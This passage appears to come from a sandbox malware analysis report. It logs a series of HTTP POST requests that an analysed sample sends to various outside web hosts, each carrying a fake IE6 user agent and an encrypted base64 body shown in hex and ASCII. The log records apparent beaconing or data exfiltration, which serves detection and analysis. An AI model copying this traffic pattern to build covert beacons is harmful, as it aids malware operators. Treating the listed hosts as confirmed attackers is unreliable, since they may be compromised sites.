                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 38 76 6f 67 69 4c 53 79 52 57 57 4d 6d 4f 59 4d 44 37 37 41 6d 51 66 51 36 33 47 73 61 61 31 39 4b 46 50 48 74 69 55 4b 79 50 30 7a 69 65 46 30 4c 31 72 6b 74 58 2f 66 37 4b 48 63 67 73 56 78 68 48 55 48 52 2b 64 34 6b 61 36 55 6f 6b 62 49 6b 41 7a 6b 6f 79 31 31 52 78 46 4e 55 6c 65 68 49 67 57 69 76 56 76 79 56 77 77 45 50 30 66 53 5a 31 53 70 33 66 6c 73 61 76 75 48 63 36 69 38 71 4f 34 6f 7a 5a 42 78 70 51 33 4d 31 62 79 31 33 56 6a 6d 4e 75 37 4f 4e 56 72 38 34 41 51 37 30 63 6e 6f 59 59 48 6e 53 6f 63 62 31 36 53 43 56 48 4d 33 30 4f 67 6d 61 6b 4c 61 42 64 78 4c 75 57 4c 77 56 55 5a 74 45 68 6a 45 51 53 6f 50 32 75 76 62 49 56 74 36 47 54 4c 59 48 39 61 36 79 50 42 36 42 2f 59 31 6d 2b 47 46 34 50 68 6b 76 31 6e 7a 69 5a 44 62 68 38 45 2f 63 57 30 5a 6d 73 4d 68 32 39 32 39 61 74 39 78 66 43 55 54 39 66 45 33 56 4b 63 4d 30 52 34 63 72 7a 45 4f 59 7a 55 7a 6f 57 63 33 2f 36 61 67 6b 45 76 33 4d 7a 6c 4a 33 41 65 69 50 7a 43 37 6d 62 68 62 63 6b 32 7a 57 48 2f 34 71 43 76 2b 44 56 68 44 62 47 73 56 72 6b 58 4d 37 41 79 76 58 77 74 47 43 4d 59 65 69 4c 6f 70 4c 36 37 6c 68 37 37 68 6f 4f 35 6c 6c 68 45 49 59 39 76 4a 6f 32 31 69 72 4c 62 4b 62 2b 74 4c 53 36 37 42 42 34 4b 43 77 58 30 38 6f 48 73 56 61 55 6d 38 6a 34 62 71 59 6d 75 6c 31 48 70 30 5a 39 69 47 61 52 58 42 57 5a 43 49 38 39 2b 66 70 38 37 75 67 55 74 72 56 63 44 72 78 5a 65 59 50 51 62 67 32 75 44 70 34 46 64 64 51 6d 4b 34 73 72 70 70 48 37 7a 37 56 57 75 47 58 39 53 6c 6a 38 31 69 77 6a 42 55 49 33 6f 62 49 6b 35 48 52 30 56 71 69 6a 55 67 66 35 36 64 75 35 31 65 58 61 47 72 6d 35 57 51 51 44 30 34 55 33 4f 57 62 37 6d 45 45 38 4f 46 66 74 49 68 51 79 63 3d Data Ascii: 8vogiLSyRWWMmOYMD77AmQfQ63Gsaa19KFPHtiUKyP0zieF0L1rktX/f7KHcgsVxhHUHR+d4ka6UokbIkAzkoy11RxFNUlehIgWivVvyVwwEP0fSZ1Sp3flsavuHc6i8qO4ozZBxpQ3M1by13VjmNu7ONVr84AQ70cnoYYHnSocb16SCVHM30OgmakLaBdxLuWLwVUZtEhjEQSoP2uvbIVt6GTLYH9a6yPB6B/Y1m+GF4Phkv1nziZDbh8E/cW0ZmsMh2929at9xfCUT9fE3VKcM0R4crzEOYzUzoWc3/6agkEv3MzlJ3AeiPzC7mbhbck2zWH/4qCv+DVhDbGsVrkXM7AyvXwtGCMYeiLopL67lh77hoO5llhEIY9vJo21irLbKb+tLS67BB4KCwX08oHsVaUm8j4bqYmul1Hp0Z9iGaRXBWZCI89+fp87ugUtrVcDrxZeYPQbg2uDp4FddQmK4srppH7z7VWuGX9Slj81iwjBUI3obIk5HR0VqijUgf56du51eXaGrm5WQQD04U3OWb7mEE8OFftIhQyc=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 6e 33 4e 4e 6d 39 30 42 50 6d 58 44 67 37 6f 35 46 42 6e 6f 51 78 62 53 51 71 6d 4c 78 76 76 46 59 57 67 37 6e 56 35 5a 4a 49 48 76 30 55 39 30 66 4a 4d 47 33 41 56 74 6c 76 4a 5a 6e 32 4b 55 65 52 76 53 4d 78 6a 7a 35 46 6b 65 45 53 45 46 31 55 39 44 55 79 31 32 77 39 6d 42 76 6f 79 45 62 4b 67 59 45 69 70 42 51 5a 75 63 48 2b 59 4c 66 2b 61 33 2f 61 44 6a 34 75 41 36 5a 39 2b 5a 44 4c 6c 43 54 52 51 73 32 4b 57 70 44 4a 76 31 69 68 79 77 74 4a 37 75 48 6e 65 66 49 57 30 2b 4e 59 34 73 50 33 43 6f 67 70 77 4c 57 75 71 78 64 50 76 67 54 75 73 34 4d 50 5a 62 32 68 33 64 30 38 42 51 71 54 42 6c 71 77 74 70 68 58 50 32 41 2f 78 6b 4f 59 79 54 68 6c 74 75 53 71 4b 57 74 7a 7a 42 51 2b 58 43 2f 58 68 6e 78 6a 44 56 6c 52 79 2b 78 52 55 6a 50 47 57 2f 49 31 2f 68 77 37 51 41 4c 76 42 53 53 32 37 4d 2f 4c 69 6e 67 7a 66 6b 39 53 65 30 35 50 6b 48 55 6f 44 4d 69 6b 53 64 64 43 42 73 73 34 62 51 43 73 6e 71 32 68 35 2b 75 35 37 6f 6f 2b 2b 69 67 47 2b 70 44 31 4f 4e 59 38 4b 78 58 74 4d 69 76 77 69 4f 4a 58 65 58 72 66 35 77 42 49 66 64 55 70 62 56 6f 36 7a 76 32 50 4f 37 72 56 38 44 2f 59 70 46 48 58 6f 2f 47 43 6b 6c 58 33 7a 75 51 63 57 53 2f 39 54 78 47 77 4a 75 72 49 4d 52 56 61 4b 33 64 41 6c 30 4b 53 62 4e 37 2b 72 70 65 61 67 57 72 49 6e 47 47 50 44 4c 32 68 56 38 4e 75 69 6d 30 62 59 48 4f 77 72 4c 58 61 41 46 65 67 51 41 63 70 70 77 5a 50 73 70 51 56 48 4d 33 7a 55 75 49 70 56 43 73 69 34 67 72 70 75 32 45 46 69 34 4a 6e 72 57 6b 77 4d 51 78 73 63 54 35 76 69 6e 43 45 47 66 37 4a 72 56 69 75 47 45 31 4b 68 35 53 39 68 45 47 2b 68 58 6a 45 79 6b 4d 35 66 74 33 42 68 66 6b 2f 54 69 38 50 32 77 46 67 2b 67 58 43 72 5a 6c 4c 4e 78 4a 30 76 6b 4b 30 6a 79 46 34 32 41 72 42 6d 59 33 56 44 70 54 79 70 70 7a 55 5a 66 76 6d 32 41 36 4b 6a 30 56 59 68 72 67 6e 53 36 Data Ascii: n3NNm90BPmXDg7o5FBnoQxbSQqmLxvvFYWg7nV5ZJIHv0U90fJMG3AVtlvJZn2KUeRvSMxjz5FkeESEF1U9DUy12w9mBvoyEbKgYEipBQZucH+YLf+a3/aDj4uA6Z9+ZDLlCTRQs2KWpDJv1ihywtJ7uHnefIW0+NY4sP3CogpwLWuqxdPvgTus4MPZb2h3d08BQqTBlqwtphXP2A/xkOYyThltuSqKWtzzBQ+XC/XhnxjDVlRy+xRUjPGW/I1/hw7QALvBSS27M/Lingzfk9Se05PkHUoDMikSddCBss4bQCsnq2h5+u57oo++igG+pD1ONY8KxXtMivwiOJXeXrf5wBIfdUpbVo6zv2PO7rV8D/YpFHXo/GCklX3zuQcWS/9TxGwJurIMRVaK3dAl0KSbN7+rpeagWrInGGPDL2hV8Nuim0bYHOwrLXaAFegQAcppwZPspQVHM3zUuIpVCsi4grpu2EFi4JnrWkwMQxscT5vinCEGf7JrViuGE1Kh5S9hEG+hXjEykM5ft3Bhfk/Ti8P2wFg+gXCrZlLNxJ0vkK0jyF42ArBmY3VDpTyppzUZfvm2A6Kj0VYhrgnS6
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 43 77 62 69 6e 71 45 66 50 6d 56 63 35 50 43 6b 41 4c 54 70 4e 33 72 6b 36 4e 4b 66 77 52 70 41 5a 53 44 4d 72 63 57 63 53 55 38 69 6c 76 43 47 35 34 6b 7a 37 69 48 72 43 6f 6f 52 48 46 58 50 36 4b 53 64 54 42 47 41 55 63 6a 66 70 64 63 42 66 6c 61 4b 4a 66 52 4d 6a 50 37 6d 46 4c 56 68 59 56 4c 46 68 58 61 59 54 4b 42 6a 6f 6f 4a 4a 46 4e 52 2b 42 67 45 57 32 4c 61 45 32 62 65 34 54 59 6c 2b 6e 43 52 49 7a 46 79 67 36 59 57 51 37 34 4d 6e 6f 65 6c 55 72 68 75 33 4a 69 56 7a 77 64 72 59 79 33 41 6d 45 72 36 45 30 69 59 77 42 64 69 58 77 47 36 44 6e 31 6f 48 75 48 7a 56 69 37 31 31 42 47 4b 74 73 57 37 6f 75 37 5a 79 68 51 63 6c 48 50 37 58 36 7a 47 66 77 71 33 32 78 4c 79 45 6e 65 73 68 6e 4f 55 31 6f 34 42 70 78 65 71 5a 33 6e 32 6a 75 55 50 53 61 37 76 59 31 51 48 4f 2b 32 51 32 48 69 4c 6f 4a 39 69 45 7a 78 38 74 6b 44 69 64 67 33 48 43 58 30 68 75 51 59 6f 54 64 6c 36 72 51 69 48 54 59 4f 4c 4c 48 46 65 42 43 41 47 2b 76 48 79 6e 43 59 42 55 49 61 32 6e 52 57 79 77 75 62 6d 47 77 63 44 49 6a 34 58 31 56 79 42 39 6d 4d 75 4b 34 77 4b 6b 43 52 74 5a 75 31 6a 36 4c 4a 35 2f 75 4f 79 6a 41 61 6d 36 78 62 50 7a 4b 30 4c 38 55 4a 46 51 49 44 6c 43 47 33 6a 58 6a 53 5a 6d 53 63 4b 61 72 35 43 75 34 46 39 4c 6e 50 78 47 6b 38 47 56 33 66 64 54 76 6a 4f 55 32 48 4b 39 67 38 4e 43 4e 2b 57 6a 44 4d 55 4c 6a 77 79 45 58 53 74 4b 5a 56 76 73 66 43 36 63 65 34 55 31 41 37 67 6c 58 43 66 63 50 65 43 43 2f 75 4f 50 50 6a 4f 66 32 45 51 6d 65 52 6c 56 49 42 48 59 51 43 45 5a 47 74 61 76 52 32 61 33 33 79 77 36 47 71 72 5a 30 39 74 43 47 6e 37 38 6b 2f 34 52 2f 52 54 75 38 4d 56 63 42 73 31 43 2f 65 5a 76 59 34 54 32 47 4d 64 58 61 45 50 6e 61 30 78 38 32 2b 30 69 Data Ascii: CwbinqEfPmVc5PCkALTpN3rk6NKfwRpAZSDMrcWcSU8ilvCG54kz7iHrCooRHFXP6KSdTBGAUcjfpdcBflaKJfRMjP7mFLVhYVLFhXaYTKBjooJJFNR+BgEW2LaE2be4TYl+nCRIzFyg6YWQ74MnoelUrhu3JiVzwdrYy3AmEr6E0iYwBdiXwG6Dn1oHuHzVi711BGKtsW7ou7ZyhQclHP7X6zGfwq32xLyEneshnOU1o4BpxeqZ3n2juUPSa7vY1QHO+2Q2HiLoJ9iEzx8tkDidg3HCX0huQYoTdl6rQiHTYOLLHFeBCAG+vHynCYBUIa2nRWywubmGwcDIj4X1VyB9mMuK4wKkCRtZu1j6LJ5/uOyjAam6xbPzK0L8UJFQIDlCG3jXjSZmScKar5Cu4F9LnPxGk8GV3fdTvjOU2HK9g8NCN+WjDMULjwyEXStKZVvsfC6ce4U1A7glXCfcPeCC/uOPPjOf2EQmeRlVIBHYQCEZGtavR2a33yw6GqrZ09tCGn78k/4R/RTu8MVcBs1C/eZvY4T2GMdXaEPna0x82+0i
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 70 73 72 74 6d 78 49 48 50 6d 55 6f 79 61 54 57 78 58 73 6f 79 42 56 4f 76 5a 46 69 6f 45 39 39 5a 6a 62 2b 39 4d 5a 43 32 34 30 75 6e 49 5a 38 4c 74 45 57 49 32 41 31 68 57 6c 4f 76 67 37 49 4f 6b 42 42 38 63 44 42 70 6d 43 33 2f 61 33 4f 68 72 52 59 5a 4f 31 59 30 56 54 43 31 43 44 64 44 34 79 56 49 61 36 5a 30 54 7a 44 67 76 47 79 45 2b 4c 57 64 6a 5a 34 49 72 77 77 45 50 4d 6b 4e 77 5a 78 39 76 70 35 72 36 67 57 56 6f 30 73 66 6c 4b 67 30 32 4f 63 4b 35 79 65 79 33 6f 41 6f 6f 5a 4a 64 39 63 30 79 66 6d 74 46 76 2f 53 6c 48 32 4a 41 34 61 6f 42 4d 32 35 30 51 34 73 78 74 53 47 64 4d 30 50 4b 76 42 59 38 76 37 38 4e 38 2b 47 45 68 36 30 72 48 75 76 65 43 2f 39 6c 36 66 4e 66 37 32 54 53 2f 42 35 6d 41 50 2b 6d 6d 73 64 6c 70 73 34 50 31 38 34 74 2f 6d 59 7a 6a 4e 38 47 79 64 43 35 68 62 34 38 4c 4f 47 77 66 71 56 4c 70 39 4f 49 69 67 6f 6b 38 47 6a 7a 39 36 76 30 75 50 36 37 4c 45 77 47 32 63 64 6e 46 52 62 31 2f 59 6a 63 42 76 71 67 66 31 7a 4e 54 36 50 65 4d 31 38 6f 73 32 7a 46 6b 6a 73 6d 68 5a 71 63 37 4f 2b 49 2f 33 44 54 58 63 6e 73 66 4d 41 34 39 37 52 6b 63 55 2b 6c 38 7a 39 77 44 51 38 39 54 4a 5a 4b 74 65 66 2b 32 55 73 59 6a 77 68 37 66 76 4e 6f 4c 6a 2f 71 50 4e 70 51 6d 52 43 30 45 52 4c 72 68 6d 76 37 31 7a 45 4c 76 65 32 54 37 2b 53 4a 4e 69 54 70 61 6e 59 71 79 42 39 32 74 58 67 30 73 63 36 67 46 53 56 36 6b 64 35 54 44 6a 79 36 55 52 36 55 56 4e 72 43 53 52 78 35 73 65 37 72 4b 68 56 30 6e 30 74 35 36 68 7a 5a 64 34 42 47 33 4d 6d 4d 6c 6f 33 6a 6d 65 51 37 4b 6b 63 65 4a 56 68 4f 49 74 53 56 70 30 63 61 73 46 2b 4f 79 6f 6d 33 49 7a 31 55 2f 4a 68 6e 56 32 35 36 46 38 79 4a 50 46 62 34 45 4d 7a 45 38 6b 31 73 76 5a 45 34 39 53 37 48 41 3d 3d Data Ascii: psrtmxIHPmUoyaTWxXsoyBVOvZFioE99Zjb+9MZC240unIZ8LtEWI2A1hWlOvg7IOkBB8cDBpmC3/a3OhrRYZO1Y0VTC1CDdD4yVIa6Z0TzDgvGyE+LWdjZ4IrwwEPMkNwZx9vp5r6gWVo0sflKg02OcK5yey3oAooZJd9c0yfmtFv/SlH2JA4aoBM250Q4sxtSGdM0PKvBY8v78N8+GEh60rHuveC/9l6fNf72TS/B5mAP+mmsdlps4P184t/mYzjN8GydC5hb48LOGwfqVLp9OIigok8Gjz96v0uP67LEwG2cdnFRb1/YjcBvqgf1zNT6PeM18os2zFkjsmhZqc7O+I/3DTXcnsfMA497RkcU+l8z9wDQ89TJZKtef+2UsYjwh7fvNoLj/qPNpQmRC0ERLrhmv71zELve2T7+SJNiTpanYqyB92tXg0sc6gFSV6kd5TDjy6UR6UVNrCSRx5se7rKhV0n0t56hzZd4BG3MmMlo3jmeQ7KkceJVhOItSVp0casF+Oyom3Iz1U/JhnV256F8yJPFb4EMzE8k1svZE49S7HA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 2f 52 44 30 6e 6a 6b 67 50 6d 58 56 43 53 65 47 79 45 7a 2b 52 74 4c 6f 58 35 77 58 6d 6e 68 54 66 61 59 75 54 74 73 30 65 65 73 43 4c 78 4b 70 73 73 48 32 47 57 50 69 6a 4e 4e 56 74 41 44 76 4c 45 38 5a 62 30 71 6f 68 47 6f 78 58 52 6a 70 30 4a 50 46 36 38 72 61 6b 62 70 6e 75 7a 78 66 67 4d 57 38 51 4f 58 74 2f 42 76 4c 45 38 51 35 47 52 50 66 32 4a 33 48 56 52 64 51 56 78 50 68 41 46 7a 41 4d 6c 2f 45 69 45 76 68 62 4e 6f 42 31 77 61 74 50 79 46 59 6c 53 54 43 54 78 33 48 61 34 58 64 4c 6b 6a 50 4b 2f 42 4f 34 61 55 7a 4a 4a 5a 49 63 72 46 77 59 47 67 4f 61 6d 70 74 31 48 4c 64 78 67 74 63 57 42 36 66 63 33 71 55 41 7a 76 33 70 63 2b 79 48 4f 56 6d 31 30 41 64 63 54 32 6d 50 2b 4d 71 50 7a 57 69 72 66 70 48 75 75 41 49 53 53 2b 33 4d 48 53 7a 6d 4c 7a 4d 45 51 47 57 50 36 34 74 6c 51 70 6e 68 47 46 4b 59 44 35 56 78 4f 6d 37 37 71 48 67 46 4f 59 4c 33 58 75 2f 58 4e 31 47 48 43 4a 45 37 34 37 36 7a 62 78 56 43 67 36 55 6e 65 35 70 77 31 61 76 43 2f 4a 5a 62 32 72 47 65 6e 47 36 4d 58 52 45 34 30 6c 73 6e 77 73 48 30 32 53 71 75 6f 67 48 4a 52 67 35 63 72 66 67 44 36 53 41 39 54 78 55 74 65 63 4a 59 4a 72 63 2b 77 53 2f 74 4a 50 4e 44 75 41 77 37 62 69 6d 78 31 61 4b 5a 38 31 58 5a 57 76 37 6e 64 49 30 46 58 6e 63 6f 65 5a 34 79 56 61 2b 76 61 4c 4e 31 6a 67 72 35 63 43 32 71 39 34 46 2b 77 43 61 74 74 4c 68 64 4a 68 47 6f 45 7a 42 78 45 34 69 6a 7a 6c 4e 5a 31 77 69 68 67 7a 54 65 62 66 47 42 78 76 4d 4b 6b 49 37 70 36 49 32 55 70 59 6b 49 72 6b 36 50 59 65 2b 77 63 56 4a 72 44 59 4e 79 67 67 75 6a 65 78 55 7a 71 45 7a 4a 44 2f 43 4e 71 39 2b 34 50 66 4a 76 79 2f 72 43 79 4b 39 78 31 2b 46 47 32 73 43 30 76 47 64 36 4e 32 5a 45 69 73 46 61 52 71 78 30 41 3d 3d Data Ascii: /RD0njkgPmXVCSeGyEz+RtLoX5wXmnhTfaYuTts0eesCLxKpssH2GWPijNNVtADvLE8Zb0qohGoxXRjp0JPF68rakbpnuzxfgMW8QOXt/BvLE8Q5GRPf2J3HVRdQVxPhAFzAMl/EiEvhbNoB1watPyFYlSTCTx3Ha4XdLkjPK/BO4aUzJJZIcrFwYGgOampt1HLdxgtcWB6fc3qUAzv3pc+yHOVm10AdcT2mP+MqPzWirfpHuuAISS+3MHSzmLzMEQGWP64tlQpnhGFKYD5VxOm77qHgFOYL3Xu/XN1GHCJE7476zbxVCg6Une5pw1avC/JZb2rGenG6MXRE40lsnwsH02SquogHJRg5crfgD6SA9TxUtecJYJrc+wS/tJPNDuAw7bimx1aKZ81XZWv7ndI0FXncoeZ4yVa+vaLN1jgr5cC2q94F+wCattLhdJhGoEzBxE4ijzlNZ1wihgzTebfGBxvMKkI7p6I2UpYkIrk6PYe+wcVJrDYNyggujexUzqEzJD/CNq9+4PfJvy/rCyK9x1+FG2sC0vGd6N2ZEisFaRqx0A==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 32 35 72 5a 65 6b 35 45 52 57 55 61 71 6c 53 32 32 58 2f 49 70 62 46 4b 70 76 6c 4f 72 41 5a 45 59 73 47 31 6a 71 32 77 65 78 78 32 6f 35 4d 66 73 56 67 44 42 68 61 59 4a 2b 4d 66 64 5a 6b 2b 64 41 2f 4d 64 73 55 52 35 4a 62 4e 59 6a 62 65 65 79 79 50 35 58 39 6b 58 36 33 49 72 7a 73 66 67 67 7a 31 74 37 59 64 48 34 76 65 30 6c 4f 68 48 6d 52 4f 47 45 49 43 6c 77 47 76 73 32 6a 6e 71 62 79 4f 75 32 75 4f 64 51 66 54 2b 59 77 6d 47 6f 38 35 6e 2f 54 57 50 4a 4e 54 34 6c 50 39 52 42 6e 66 6e 4c 64 54 4c 69 78 4f 53 51 33 41 6c 33 44 4c 42 37 35 64 2b 62 70 49 53 64 42 52 72 73 71 68 62 58 4b 4f 42 6a 75 32 4e 53 69 70 4d 49 48 6b 75 6a 47 65 6b 2f 48 47 6d 4b 77 44 71 36 66 51 48 31 78 62 61 4e 4d 32 6c 4b 6c 70 70 69 48 56 62 56 79 47 43 6f 71 62 61 4f 49 2f 37 35 68 61 30 67 64 39 54 57 53 5a 6f 46 42 6f 61 32 69 63 72 51 7a 6e 42 4b 68 48 65 41 73 34 76 78 54 2f 33 56 48 58 6c 2b 2b 73 69 43 59 37 61 6d 7a 4b 42 55 41 57 4f 69 67 35 38 61 61 65 57 46 6a 38 67 42 44 4f 68 33 4e 76 35 74 70 4b 2f 76 58 43 74 56 51 54 6f 51 32 41 32 6e 36 59 46 35 62 4e 4a 31 2f 48 68 5a 73 37 73 48 47 71 39 59 6b 31 56 54 2b 37 6e 57 57 35 7a 33 63 74 74 4a 56 76 39 65 54 61 2b 78 72 4d 66 54 64 75 57 61 45 2f 56 32 6c 6c 6b 7a 42 2b 45 68 68 76 6d 66 62 65 31 4c 77 77 6b 54 49 45 61 34 4f 48 49 6d 2f 4d 62 4a 65 56 49 37 55 50 37 4c 49 50 65 52 76 44 70 45 78 31 78 4e 51 4f 7a 67 4f 58 38 48 71 78 51 56 62 6e 38 76 55 6f 6b 55 4b 49 37 6c 7a 54 66 79 4e 36 77 66 78 53 75 65 65 68 39 44 57 4c 64 64 79 4c 55 49 35 78 2b 53 46 54 50 38 30 4a 59 2f 30 48 4f 43 77 78 6f 53 77 64 71 41 2f 70 44 62 4d 61 76 71 36 4d 44 6b 70 6a 6e 4b 73 77 62 33 72 77 34 76 4c 34 37 6e 76 64 69 75 65 5a 43 79 71 44 77 65 52 49 37 78 37 41 42 79 43 49 76 6b 30 32 6f 2b 38 3d Data Ascii: 25rZek5ERWUaqlS22X/IpbFKpvlOrAZEYsG1jq2wexx2o5MfsVgDBhaYJ+MfdZk+dA/MdsUR5JbNYjbeeyyP5X9kX63Irzsfggz1t7YdH4ve0lOhHmROGEIClwGvs2jnqbyOu2uOdQfT+YwmGo85n/TWPJNT4lP9RBnfnLdTLixOSQ3Al3DLB75d+bpISdBRrsqhbXKOBju2NSipMIHkujGek/HGmKwDq6fQH1xbaNM2lKlppiHVbVyGCoqbaOI/75ha0gd9TWSZoFBoa2icrQznBKhHeAs4vxT/3VHXl++siCY7amzKBUAWOig58aaeWFj8gBDOh3Nv5tpK/vXCtVQToQ2A2n6YF5bNJ1/HhZs7sHGq9Yk1VT+7nWW5z3cttJVv9eTa+xrMfTduWaE/V2llkzB+Ehhvmfbe1LwwkTIEa4OHIm/MbJeVI7UP7LIPeRvDpEx1xNQOzgOX8HqxQVbn8vUokUKI7lzTfyN6wfxSueeh9DWLddyLUI5x+SFTP80JY/0HOCwxoSwdqA/pDbMavq6MDkpjnKswb3rw4vL47nvdiueZCyqDweRI7x7AByCIvk02o+8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 6a 5a 6a 66 46 74 6e 31 57 6d 57 77 49 41 41 65 36 4f 55 79 6f 6e 4a 7a 4c 69 63 33 34 44 6e 50 48 63 62 6d 2b 31 66 71 49 4c 56 65 30 46 78 38 43 73 58 6e 51 4d 36 50 63 70 70 4b 61 30 6c 5a 75 71 36 69 47 57 4d 36 36 67 33 37 68 63 43 5a 53 68 6c 6d 76 67 45 33 31 68 6a 61 37 49 75 52 51 34 35 31 35 65 73 50 43 74 59 67 55 38 62 54 31 42 47 4b 4d 71 47 48 6b 59 48 52 34 37 6c 5a 39 53 31 46 62 38 57 6e 76 34 39 38 66 30 63 42 6c 66 36 38 46 67 44 4c 44 30 41 6c 30 36 65 6a 6e 42 49 38 7a 4f 42 65 56 77 48 61 6d 45 74 53 59 58 51 59 69 59 4b 58 42 68 4f 6c 67 62 77 63 73 77 69 4a 35 32 67 62 65 45 32 69 78 76 58 4d 2b 32 42 43 62 33 73 4e 68 64 54 79 66 6c 49 59 4d 4f 42 4c 59 5a 31 78 42 2f 47 48 48 6a 43 6d 62 63 50 71 50 53 78 63 79 58 50 57 61 6d 30 54 6f 67 59 59 36 38 48 49 64 36 44 55 30 58 31 53 47 57 4a 63 2f 70 32 6e 44 4f 4b 35 70 42 55 79 65 68 46 71 78 73 6a 6b 34 2f 78 43 56 41 6c 4f 67 74 7a 39 65 32 46 72 76 6d 51 77 47 66 4f 4b 44 5a 41 6f 46 7a 4e 36 52 31 7a 55 30 74 4a 61 59 49 39 36 43 6e 59 77 54 58 54 50 38 31 67 36 49 48 33 58 6f 4b 36 53 30 4d 31 76 76 6a 75 55 59 4b 56 2b 43 38 59 4b 51 77 73 4f 45 2b 31 44 50 58 38 33 37 34 72 52 68 74 6a 4b 70 65 35 4c 46 59 44 57 4b 42 43 72 62 4a 67 6b 2b 58 39 6e 58 47 4d 55 4b 69 4c 6a 38 35 32 6c 46 6d 42 51 41 72 4c 72 46 4b 32 55 4f 6f 35 73 6f 4b 6e 76 43 66 45 79 42 59 76 50 4f 52 2b 6d 6f 50 6b 79 63 53 44 65 72 49 33 57 55 42 65 32 4c 59 6c 4c 55 50 34 2b 73 32 67 34 6d 30 76 6f 55 7a 76 5a 50 70 71 47 44 56 34 43 70 74 76 6d 62 32 35 33 45 49 63 56 36 76 39 50 41 77 49 32 66 6b 52 36 36 52 47 6d 56 64 59 50 72 76 4d 52 50 36 61 4b 6b 63 2f 4e 71 4a 6b 51 59 44 62 61 6e 4c 6b 65 6a 53 35 6c 35 6c 4a 55 57 53 73 4e 31 68 5a 49 44 52 74 5a Data Ascii: jZjfFtn1WmWwIAAe6OUyonJzLic34DnPHcbm+1fqILVe0Fx8CsXnQM6PcppKa0lZuq6iGWM66g37hcCZShlmvgE31hja7IuRQ4515esPCtYgU8bT1BGKMqGHkYHR47lZ9S1Fb8Wnv498f0cBlf68FgDLD0Al06ejnBI8zOBeVwHamEtSYXQYiYKXBhOlgbwcswiJ52gbeE2ixvXM+2BCb3sNhdTyflIYMOBLYZ1xB/GHHjCmbcPqPSxcyXPWam0TogYY68HId6DU0X1SGWJc/p2nDOK5pBUyehFqxsjk4/xCVAlOgtz9e2FrvmQwGfOKDZAoFzN6R1zU0tJaYI96CnYwTXTP81g6IH3XoK6S0M1vvjuUYKV+C8YKQwsOE+1DPX8374rRhtjKpe5LFYDWKBCrbJgk+X9nXGMUKiLj852lFmBQArLrFK2UOo5soKnvCfEyBYvPOR+moPkycSDerI3WUBe2LYlLUP4+s2g4m0voUzvZPpqGDV4Cptvmb253EIcV6v9PAwI2fkR66RGmVdYPrvMRP6aKkc/NqJkQYDbanLkejS5l5lJUWSsN1hZIDRtZ
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.synetik.netCache-Control: no-cacheData Raw: 38 35 7a 36 47 30 34 67 57 32 58 45 38 53 4b 7a 32 61 75 4d 32 4c 47 47 4a 41 4e 4f 75 46 66 6e 59 71 57 62 55 41 49 2f 4a 74 63 31 33 71 55 6c 75 57 35 68 45 42 71 39 73 76 61 48 55 46 56 6c 30 32 79 2f 2f 65 76 55 71 44 65 4b 53 4b 76 55 68 32 77 77 34 62 32 4f 76 33 54 51 33 32 64 37 57 4e 57 54 65 6d 31 54 4a 34 38 37 33 57 47 69 74 32 38 32 59 64 4d 49 37 65 37 42 6c 4b 2f 78 52 66 52 57 35 69 7a 31 4c 45 6e 45 65 45 6a 63 77 7a 37 58 63 6c 44 46 51 6f 79 41 64 66 71 38 45 30 41 2b 63 4e 52 2b 33 67 70 4b 61 31 56 75 6a 33 42 44 2b 35 32 5a 52 7a 64 5a 6f 38 63 2f 33 2b 36 4e 70 43 34 46 5a 71 45 74 30 36 4d 2f 47 4c 67 74 48 38 69 79 62 73 65 4e 4e 34 34 61 41 66 65 57 4b 76 4f 66 4f 4e 39 6b 32 2f 71 61 4e 6d 2f 45 54 34 50 50 6b 73 63 6b 4a 31 63 45 4c 7a 52 73 48 64 53 57 6e 32 61 74 5a 37 52 49 4d 78 48 58 75 48 35 61 50 4d 67 35 73 4e 64 52 5a 70 79 4e 55 6e 6f 4e 69 6c 57 30 39 79 72 63 49 45 56 39 70 48 47 64 50 75 6f 75 61 49 52 55 74 62 42 33 2b 6d 6d 32 54 37 61 75 4b 2b 2b 51 31 34 4e 76 6d 4d 70 4f 66 73 47 43 59 63 4b 4a 6a 36 7a 4c 2f 6a 62 38 6a 54 68 44 46 44 38 36 73 43 78 50 2b 46 32 74 41 63 4e 79 76 4c 64 63 42 6c 4f 63 31 6f 4a 55 4c 61 48 66 30 53 66 62 2f 67 58 41 4a 30 48 32 4c 6b 33 59 48 63 65 4a 70 32 55 75 51 57 45 34 64 49 6d 46 78 46 63 6a 52 72 36 77 58 43 56 4b 67 57 49 50 73 54 67 4d 61 55 31 41 41 43 7a 55 38 59 74 31 4c 75 59 57 74 43 76 4e 73 39 6e 49 6f 2f 75 45 6b 39 48 